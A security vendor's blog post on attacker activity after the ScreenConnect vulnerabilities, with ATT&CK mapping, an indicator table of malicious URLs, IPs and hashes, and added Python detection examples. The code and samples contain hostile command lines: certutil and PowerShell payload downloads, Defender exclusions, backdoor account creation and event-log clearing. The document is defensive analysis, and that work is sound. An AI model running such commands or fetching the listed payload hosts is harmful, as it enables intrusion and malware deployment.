# SlashAndGrab: ScreenConnect Post-Exploitation in the Wild (CVE-2024-1709 & CVE-2024-1708)

Huntress

Since February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we're calling SlashAndGrab. In previous posts we shared the details of this vulnerability, its exploit, and detection guidance.

In this article, we've collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC), where our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation tradecraft.

The adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and enjoy some tradecraft.

## Ransomware

A number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware.

With the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how LockBit is still relevant. The LockBit deployments that we've seen are invoked with an encryptor that looks to be compiled around September 13, 2022, which is the same timeline as the leaked LockBit 3.0 builder. One observed filename is the classic `LB3.exe`, which again matches the canned and publicly leaked builder.

We believe this is an important distinction: while the malware deployed appears associated with LockBit, there is no evidence we've seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the world.

We've included the resulting ransom note associated with the above executable.

We observed other ransomware attempts, like `upd.exe` and `svchost.exe`, that Microsoft Defender consistently neutralized.

We also observed adversaries leverage certutil-downloaded ransomware `MSI` payloads, which they also made persistent via startup folders.

The ransom note from the threat actor who deployed the MSI has been included as well.

Ransomware actors also tried
to remove event logs via `wevtutil.exe cl` to frustrate investigators' analysis at a later time. Fortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration.

## Adversaries Enumerating

There was a particular adversary using 185.62.58.132 executing a script on compromised systems across multiple unique victim networks. The intent of the script was to identify which of their compromised systems had the highest privileges. We believe this demonstrates the scale with which threat actors are abusing this vulnerability, as they are working to automate their understanding of where to take additional post-compromise actions moving forward.

## Cryptocurrency Miners

Somewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin miners.

There was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file.

We also observed adversaries downloading and using an xmrig cryptominer, with further details below.

## Additional Remote Access Tools

Adversaries seemed to commonly install additional legitimate remote access tools, likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up.

An adversary we observed installed the SimpleHelp RMM from their ScreenConnect initial access.

We observed the SimpleHelp RMM agent deployed in the following directories:

We also observed a configuration file dropped to `C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml`, which revealed it was configured to communicate with the public IPv4 address 91.92.240.71.

The user `oldadmin` was observed running similar commands across multiple unique victim organizations.

This threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an RDP connection.

We also observed an adversary do something quite interesting with Google Chrome's Remote
Desktop. They pulled the installer directly from Google infrastructure, which installs it as a service, no doubt in the hopes they could persistently and remotely access the environment via a second GUI remote access tool. We enjoy crushing hacker hopes here at Huntress.

## Downloading Tools and Payloads

A common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloads.

For example, an adversary leveraged PowerShell's `Invoke-WebRequest` (`iwr`) to call on additional payloads for their SSH persistent tunnel.

We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to `.png`s in an attempt to evade detection (spoiler: they did not evade detection).

There was also this straightforward PowerShell downloading activity. However, the file was deleted and their infrastructure was offline, meaning the file's intent has not been determined.

We also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under the radar.

Some adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example, `svchost.exe` was deleted before analysis could be conducted.

Adversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure. Specifically, this threat actor saved their beacon as a `.PDF` on a web server, renaming it to a `.DAT` on the targeted machine.

Interestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website `transfer.sh`.

Excerpt of the script (full script in the Appendix):

## Cobalt Strike

Unsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host.

It's also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.

It was also common to see the same adversaries drop the earlier mentioned SentinelUI
cryptocurrency miner and attempt a Cobalt Strike beacon, which Windows Defender would neutralize.

## Persistence

Adversaries of course want to persist in an environment beyond their initial access method, and for good reason: this ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversary's access.

Our SOC observed a number of adversaries prioritize creating their own users once they landed on a machine, using naming conventions that would attempt to fly under the radar, as well as adding these users to highly privileged groups.

The SOC also observed an adversary transfer a `C:\perflogs\RunSchedulerTaskOnce.ps1` from the compromised ScreenConnect instance, as confirmed from analysis of Windows Event Logs (`Application.evtx`, Event ID 0).

The script was in fact deleted, but could be partially restored by taking the PowerShell Operational EVTX and running this script, which re-stitched the script back together from its ScriptBlockId (excerpt of script below):

This would download a `driver.dll` and leverage WMI Event Consumer PowerShell (PwSH) persistence named `SystemCmr`.

## Conclusion

This incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it's a shame our adversaries didn't commit to pairing this new exploit with new tradecraft.

It's worth driving this point home: most of the post-compromise activities we have documented in this article aren't novel, original, or outstanding. Most threat actors simply don't know what to do beyond the same usual procedural tradecraft. Cybercriminals are rarely sophisticated, and the infosec community can beat them together.

Adversaries will default to their tried and true methods. An experienced, talented security team can neutralize most threat actors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help monitoring for activity related to this vulnerability, you can use
the Huntress free trial.

If you're interested in more, come and check out the next episode of our Product Lab webinar, where we'll be sharing even more technical details behind this threat and answering any questions from the community.

## MITRE ATT&CK

| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1190 Exploit Public-Facing Application | Adversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote control. |
| Discovery | T1087 Account Discovery | Adversaries are attempting to discover privileged users by running a script across compromised systems. |
| Defense Evasion | T1562.001 Disable or Modify Tools | Adversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell. |
| Defense Evasion | T1070.001 Clear Windows Event Logs | Ransomware actors attempt to remove event logs using the `wevtutil.exe cl` command to hinder forensic analysis. |
| Execution | T1059 Command and Scripting Interpreter; T1059.001 PowerShell; T1059.003 Windows Command Shell | Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating various activities such as cryptocurrency mining and remote access. |
| Persistence | T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Adversaries stored their MSI ransomware payload in the Public startup folder. |
| Persistence | T1136 Create Account | Adversaries created new users and, in some instances, added them to privileged groups. |
| Persistence | T1053 Scheduled Task | Adversaries are creating scheduled tasks for their cryptominers and remote access. |
| Persistence | T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription | Adversaries are modifying the registry to achieve persistence by adding WMI Event Consumers. |
| Persistence | T1133 External Remote Services | Adversaries are compromising ScreenConnect instances, deploying SSH tunnels, Chrome Remote Desktop, and alternate RMMs for evasive, persistent remote access. |
| Command and Control | T1105 Ingress Tool Transfer | Adversaries are downloading files using curl, certutil, and Invoke-WebRequest. |
| Command and Control | T1572 Protocol Tunneling | Adversaries created SSH tunnels for communication. |
| Impact | T1496 Resource Hijacking | Cryptocurrency miners are being deployed by adversaries. |
| Impact | T1486 Data Encrypted for Impact | Adversaries deployed ransomware via compromised ScreenConnect. |
| Software | S0154 Cobalt Strike | Adversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines. |
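Several of the techniques above (event log clearing, certutil/iwr/curl downloads, the `.png` rename, Defender exclusions, and account creation) leave their fingerprints in process command lines. The following is an added example, written for this article and not code from Huntress or the post, that runs a small rule set over constructed process-creation records shaped like Sysmon Event ID 1 (`Image`, `CommandLine`, `ParentImage`). The sample command lines, the TEST-NET addresses, the account name, and the ScreenConnect parent process path are all constructed; the use of `net.exe` for account creation is an assumption, since the post does not name the tool the adversaries used.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record; field names follow Sysmon Event ID 1."""
    image: str
    command_line: str
    parent_image: str


# (ATT&CK label, pattern applied to the lower-cased command line)
RULES = [
    # T1070.001: "wevtutil cl <log>" wipes an event log
    ("T1070.001 Clear Windows Event Logs",
     re.compile(r"\bwevtutil(?:\.exe)?\b.*\b(?:cl|clear-log)\b")),
    # T1105: certutil's URL cache switch used as a downloader
    ("T1105 Ingress Tool Transfer (certutil)",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b.*\s-f\b")),
    # T1105: Invoke-WebRequest / iwr pulling a payload from a URL
    ("T1105 Ingress Tool Transfer (PowerShell)",
     re.compile(r"\b(?:invoke-webrequest|iwr)\b.*https?://")),
    # T1105: curl writing its download under an image extension (the .png rename seen above)
    ("T1105 Ingress Tool Transfer (curl, disguised extension)",
     re.compile(r"\bcurl(?:\.exe)?\b.*\s-o\s+\S+\.(?:png|jpg|jpeg|gif)\b")),
    # T1562.001: Defender exclusions added from PowerShell
    ("T1562.001 Disable or Modify Tools (Defender exclusion)",
     re.compile(r"\b(?:add|set)-mppreference\b.*\s-exclusion(?:path|process|extension)\b")),
    # T1136: local account creation (net.exe is an assumption; the post does not name the tool)
    ("T1136 Create Account",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b")),
    # T1136: the new account being added to the local Administrators group
    ("T1136 Create Account (privileged group)",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s.*\s/add\b")),
]


def triage(event: ProcessEvent) -> list[str]:
    """Return the ATT&CK labels whose pattern matches this event's command line."""
    cl = event.command_line.lower()
    hits = [label for label, pat in RULES if pat.search(cl)]
    # The post describes this tradecraft running inside ScreenConnect sessions, so a hit whose
    # parent is the ScreenConnect client service deserves extra weight (parent path is assumed).
    if hits and "screenconnect" in event.parent_image.lower():
        hits.append("context: spawned from a ScreenConnect session")
    return hits


def triage_all(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each suspicious command line to its labels; events with no hits are omitted."""
    findings = {}
    for e in events:
        hits = triage(e)
        if hits:
            findings[e.command_line] = hits
    return findings


# Constructed sample records (not taken from the post). 203.0.113.0/24 is TEST-NET-3.
SC_PARENT = r"C:\Program Files (x86)\ScreenConnect Client (c2e1f6c0)\ScreenConnect.ClientService.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security", CMD),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10:8084/msappdata.msi C:\Users\Public\u.msi", CMD),
    ProcessEvent(PS, r'powershell.exe -nop -w hidden -c "iwr http://203.0.113.10/r.ps1 -OutFile C:\perflogs\r.ps1"', SC_PARENT),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"curl.exe -o C:\Windows\sun.png https://files.example.invalid/pub/media/sun.png", CMD),
    ProcessEvent(PS, r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\ProgramData"', SC_PARENT),
    ProcessEvent(r"C:\Windows\System32\net.exe", "net user svc_backup Summer2024! /add", CMD),
    ProcessEvent(r"C:\Windows\System32\net1.exe", "net1 localgroup administrators svc_backup /add",
                 r"C:\Windows\System32\net.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\alice\notes.txt",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for command_line, labels in triage_all(SAMPLE_EVENTS).items():
        print(command_line)
        for label in labels:
            print("   ", label)
```

The rules are deliberately narrow: `certutil` must carry both `-urlcache` and `-f`, `curl` must write to an image-named file, and a net user/localgroup pair only matters when it ends in `/add`. In a real pipeline the parent-process context is what separates an administrator's one-off `wevtutil` from the ransomware actor's; feed it the parent chain rather than relying on command-line text alone.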
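The Persistence section describes recovering a deleted `RunSchedulerTaskOnce.ps1` by re-stitching PowerShell Operational log fragments by their ScriptBlockId. As an added example (not the Huntress SOC's script, which the post only excerpts), the following Python does that reassembly from exported Windows event XML: it keeps only Event ID 4104 records, groups `ScriptBlockText` fragments by `ScriptBlockId`, orders them by `MessageNumber`, reports any `MessageNumber` that is absent so a partial recovery is labelled as such, and finally scans the recovered text for the WMI event subscription class names that the post's `SystemCmr` persistence would involve. The XML records below are constructed; only the `driver.dll`, `SystemCmr` and `C:\perflogs\RunSchedulerTaskOnce.ps1` names come from the post, and the 203.0.113.10 address is TEST-NET.

```python
from __future__ import annotations
import xml.etree.ElementTree as ET
from collections import defaultdict
from dataclasses import dataclass, field

# Namespace used by exported Windows event XML (wevtutil epl/qe or Get-WinEvent ToXml output)
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Substrings in recovered script text that point at WMI event subscription persistence (T1546.003)
PERSISTENCE_MARKERS = ["root\\subscription", "__EventFilter", "CommandLineEventConsumer",
                       "ActiveScriptEventConsumer", "__FilterToConsumerBinding", "Register-WmiEvent"]


@dataclass
class RecoveredScript:
    script_block_id: str
    path: str                 # Path field: the .ps1 the block was read from; empty for interactive input
    total: int                # MessageTotal: number of fragments the whole block was logged as
    text: str                 # fragments that were present, concatenated in MessageNumber order
    missing: list[int] = field(default_factory=list)   # MessageNumbers not found in the log

    @property
    def complete(self) -> bool:
        return not self.missing


def parse_4104(xml_text: str) -> list[dict[str, str]]:
    """Return the EventData fields of every Event ID 4104 record in an exported XML document."""
    root = ET.fromstring(xml_text)
    records = []
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        records.append({d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)})
    return records


def reassemble(records: list[dict[str, str]]) -> dict[str, RecoveredScript]:
    """Group fragments by ScriptBlockId, order them by MessageNumber and note any gaps."""
    frags: dict[str, dict[int, str]] = defaultdict(dict)
    meta: dict[str, tuple[int, str]] = {}
    for r in records:
        sbid = r["ScriptBlockId"]
        frags[sbid][int(r["MessageNumber"])] = r["ScriptBlockText"]
        meta[sbid] = (int(r["MessageTotal"]), r.get("Path", ""))
    result = {}
    for sbid, parts in frags.items():
        total, path = meta[sbid]
        missing = [n for n in range(1, total + 1) if n not in parts]
        text = "".join(parts[n] for n in sorted(parts))
        result[sbid] = RecoveredScript(sbid, path, total, text, missing)
    return result


def persistence_markers(text: str) -> list[str]:
    """Which WMI-subscription indicators appear in the recovered script (case-insensitive)."""
    lowered = text.lower()
    return [m for m in PERSISTENCE_MARKERS if m.lower() in lowered]


# Constructed sample export: three fragments of one block logged out of order, one unrelated
# 4103 record, and a second block with its first fragment missing.
EVT = '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
SYS = '<System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID></System>'
SBID = "aaaaaaaa-1111-2222-3333-bbbbbbbbbbbb"
PATH = r"C:\perflogs\RunSchedulerTaskOnce.ps1"
FRAG = [(2, r"Invoke-WebRequest -Uri $u -OutFile C:\ProgramData\driver.dll"),
        (3, r"Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs"),
        (1, "$u = 'http://203.0.113.10/driver.dll'")]
SAMPLE_XML = "<Events>" + "".join(
    f'{EVT}{SYS}<EventData><Data Name="MessageNumber">{n}</Data><Data Name="MessageTotal">3</Data>'
    f'<Data Name="ScriptBlockText">{t}\n</Data><Data Name="ScriptBlockId">{SBID}</Data>'
    f'<Data Name="Path">{PATH}</Data></EventData></Event>' for n, t in FRAG
) + (f'{EVT}<System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4103</EventID></System>'
     '<EventData><Data Name="Payload">CommandInvocation(Write-Output)</Data></EventData></Event>'
     f'{EVT}{SYS}<EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>'
     '<Data Name="ScriptBlockText">Write-Output \'done\'\n</Data>'
     '<Data Name="ScriptBlockId">cccccccc-4444-5555-6666-dddddddddddd</Data></EventData></Event>'
     "</Events>")

if __name__ == "__main__":
    for s in reassemble(parse_4104(SAMPLE_XML)).values():
        status = "complete" if s.complete else f"partial, missing fragments {s.missing}"
        print(f"{s.script_block_id} ({s.path or 'interactive'}): {status}")
        print(s.text, "markers:", persistence_markers(s.text))
```

The `missing` list is the important output when the log has rolled over or the actor cleared it, which is exactly the "partially restored" situation the post describes: a gap in `MessageNumber` means the recovered text is incomplete, not that the script was short. Exporting the log with `wevtutil qe Microsoft-Windows-PowerShell/Operational /f:xml` produces records in this shape.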
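The T1546.003 row above and the `SystemCmr` WMI Event Consumer in the Persistence section are visible on a host running Sysmon as three related records: Event ID 19 (WmiEventFilter), 20 (WmiEventConsumer) and 21 (WmiEventConsumerToFilter binding). The added example below, which is not from the post or from Huntress, correlates those three into one persistence chain per binding and flags the chains whose consumer runs a command, whose destination launches a scripting host, or whose filter is a periodic timer query. The records are constructed (only the name `SystemCmr` comes from the post; the built-in `SCM Event Log` filter and consumer are Windows' own and serve as the benign baseline); the field names follow Sysmon's published schema for these events.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Sysmon 21 renders the two ends of a binding as WMI object paths, e.g.
#   Consumer: CommandLineEventConsumer.Name="SystemCmr"   Filter: __EventFilter.Name="SystemCmr"
OBJ_PATH = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]+)"$')
CODE_CONSUMERS = ("CommandLineEventConsumer", "ActiveScriptEventConsumer")
LAUNCHERS = re.compile(r"powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32", re.I)
HIDDEN_PS = re.compile(r"-enc\w*|-e\b|-w(?:indowstyle)?\s+hidden|-nop", re.I)
TIMER_QUERY = re.compile(r"__InstanceModificationEvent.*(?:Win32_LocalTime|Win32_PerfFormattedData)", re.I)


@dataclass
class WmiPersistence:
    filter_name: str
    query: str
    consumer_class: str
    consumer_name: str
    destination: str
    user: str
    flags: list[str]


def parse_object_path(value: str) -> tuple[str, str]:
    """Split 'Class.Name="Instance"' into (Class, Instance)."""
    m = OBJ_PATH.match(value)
    if not m:
        raise ValueError(f"unexpected WMI object path: {value!r}")
    return m["cls"], m["name"]


def correlate(records: list[dict]) -> list[WmiPersistence]:
    """Join every 'Created' binding (21) to its filter (19) and consumer (20) and assess it."""
    filters = {r["Name"]: r for r in records if r["EventID"] == 19 and r["Operation"] == "Created"}
    consumers = {r["Name"]: r for r in records if r["EventID"] == 20 and r["Operation"] == "Created"}
    findings = []
    for b in records:
        if b["EventID"] != 21 or b["Operation"] != "Created":
            continue
        c_cls, c_name = parse_object_path(b["Consumer"])
        _, f_name = parse_object_path(b["Filter"])
        query = filters.get(f_name, {}).get("Query", "")
        dest = consumers.get(c_name, {}).get("Destination", "")
        flags = []
        if c_cls in CODE_CONSUMERS:
            flags.append("consumer executes code")
        if LAUNCHERS.search(dest):
            flags.append("destination launches a scripting host or LOLBIN")
        if HIDDEN_PS.search(dest):
            flags.append("hidden/encoded PowerShell switches")
        if TIMER_QUERY.search(query):
            flags.append("timer-style trigger (fires periodically or after boot)")
        findings.append(WmiPersistence(f_name, query, c_cls, c_name, dest, b.get("User", ""), flags))
    return findings


def suspicious(findings: list[WmiPersistence]) -> list[WmiPersistence]:
    return [f for f in findings if f.flags]


# Constructed Sysmon WmiEvent records, as the EventData fields look after parsing.
SYSTEM = "NT AUTHORITY\\SYSTEM"
SAMPLE = [
    {"EventID": 19, "Operation": "Created", "User": SYSTEM, "EventNamespace": "root\\cimv2", "Name": "SystemCmr",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Operation": "Created", "User": SYSTEM, "Name": "SystemCmr", "Type": "Command Line",
     "Destination": r"powershell.exe -NoP -W Hidden -File C:\ProgramData\task.ps1"},
    {"EventID": 21, "Operation": "Created", "User": SYSTEM,
     "Consumer": 'CommandLineEventConsumer.Name="SystemCmr"', "Filter": '__EventFilter.Name="SystemCmr"'},
    # Windows' own subscription: a filter/consumer pair that should be on every host
    {"EventID": 19, "Operation": "Created", "User": SYSTEM, "EventNamespace": "root\\cimv2",
     "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "User": SYSTEM, "Name": "SCM Event Log Consumer",
     "Type": "NT Event Log", "Destination": ""},
    {"EventID": 21, "Operation": "Created", "User": SYSTEM,
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    # a consumer that was created but never bound: inert until a 21 appears for it
    {"EventID": 20, "Operation": "Created", "User": SYSTEM, "Name": "Orphan", "Type": "Command Line",
     "Destination": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for f in suspicious(correlate(SAMPLE)):
        print(f"{f.consumer_class} '{f.consumer_name}' <- filter '{f.filter_name}' by {f.user}")
        print("  destination:", f.destination)
        for flag in f.flags:
            print("  !", flag)
```

Keying on the binding event is what keeps this precise: a filter or consumer on its own does nothing, so the orphaned `cmd.exe` consumer in the sample is not reported until a binding for it appears. Without Sysmon, the same three objects can be enumerated on demand from the `root\subscription` namespace (`__EventFilter`, `__EventConsumer`, `__FilterToConsumerBinding`) and fed to `correlate` in the same shape.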
## Indicators of Compromise

| IoC Type | Indicator | Hash |
|---|---|---|
| Ransomware | `C:\Windows\TEMP\ScreenConnect\22.5.7881.8171\LB3.exe` | 78a11835b48bbe6a0127b777c0c3cc102e726205f67afefcd82f073e56489e49 |
| Ransomware | `http://23.26.137.225:8084/msappdata.msi` → `cmpyutd.msi` | 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600 |
| Ransomware | `UPX.exe` | 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a |
| Ransomware | `svchost.exe` | a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0 |
| Cryptocurrency Miner | `hxxps://transfer.sh/GElU1LmvbS/injcet.ps1` | ec49f5033374eb8f533e291111e1433e2da127f45857aebbbe614e711b3ca989 |
| Cobalt Strike | `hxxpminishwikigdcpdf` → `C:\programdata\update.dat` | 0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe |
| Cobalt Strike | `C:\perflogs\RunSchedulerTaskOnce.ps1` | 6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20844d7b2d75b20163 |
| Cobalt Strike | `copy.exe` | 81b4a649a42a157facede979828095ccddcdf6cec47e8a3156530e0c02e9625e |
| Google Chrome Remote Desktop | `https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi` → `C:\ProgramData\1.msi` | c47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f235454a54e2134265 |
| SimpleHelp RMM | `https://cmctt.com/pub/media/wysiwyg/sun.png` → `C:\Windows\spsrv.exe` | e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793 |
| SimpleHelp RMM | `cmctt.com/pub/media/wysiwyg/invoke.png` | 37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b |
| SimpleHelp RMM | `C:\Users\oldadmin\Documents\Maxx Uptime remote connection\Files\agent.exe` | a0fd0ceb95e775a48a95c00eab42fa5bb170f552005c38812fd03ab4cc14932e |
| SimpleHelp RMM | `C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml` | 2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b6120ba21f4505f47 |
| SimpleHelp RMM IPv4 | 91.92.240.71 | |
| SSH Script | `d` | 69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a1e0f20ce4a0d5cde |
| SSH Script | `Z.zip` | aa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed45657d7f333a0efe |
| Beacon | `driver.dll` | 6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090 |
| Unknown | `159.65.130.146:4444/svchost.exe` → `C:\Windows\Temp\svchost.exe` | |
| Cryptocurrency Miner | `http18523292328888SentinelUIexe` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/s27p8BcTxi/config12.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/ojw6aKoA4A/config11.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/8l4d5qR39o/config9.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/xkIMWnocQH/config8.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/Db5eUfqKP9/config7.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/L1e30KShXP/config6.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/w2Y0iuEKiY/config5.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/6bkwRh4NXd/config4.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/PRBRzMMEKC/config3.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/RWSn6NLIr7/config2.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/MRFibhy8fS/config1.json` | |
| Cryptocurrency Miner | `hxxps://transfer.sh/FeDRSFU5XV/config.json` | |

## Appendix

Contents of `inject.ps1` (cryptocurrency miner):

Thank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher "Dipo" Rodipe, Dray Agha, Faith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John "JB" Brennan, Jordan Sexton, Josh Allman, Mehtap
Ozdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, and Tim Kasper.

Special thanks to Josh Allman and Dray Agha for further analysis and for collecting and curating this blog.